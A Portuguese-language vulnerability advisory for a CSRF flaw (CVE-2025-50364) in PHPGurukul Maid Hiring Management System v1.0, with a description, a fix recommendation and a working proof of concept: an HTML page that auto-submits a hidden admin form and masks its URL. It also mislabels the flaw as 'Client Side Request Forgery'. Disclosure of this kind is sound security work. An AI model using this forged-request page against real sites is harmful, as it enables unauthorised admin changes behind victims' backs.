
Prova de conceito de exploração de CSRF visando CVE-2025-50364 no PHPGurukul Maid Hiring Management System v1.0 que adiciona categorias de administrador arbitrárias por meio de um formulário HTML elaborado.
Nome do Projeto e URL do Repositório: Sistema de Gestão de Contratação de Empregadas Domésticas usando PHP e MySQL
Tipo de Vulnerabilidade: Client Side Request Forgery
Versão(ões) Afetada(s): v1.0
💣Descrição da Vulnerabilidade: Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no painel de administração do PHPGurukul Hiring Management System, permitindo que um atacante adicione categorias de contratação arbitrárias ao enganar um administrador autenticado para visitar um site malicioso. Isso pode levar à poluição de dados e alterações não autorizadas em nível de administrador.
👩💻Impacto: Criação não autorizada de categorias
🛜Prova de Conceito (PoC)

/admin/add-category.php
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Recomendação: Implementar tokens CSRF em formulários de administração, reforçar cookies SameSite e validar a origem da requisição para evitar ações não autorizadas.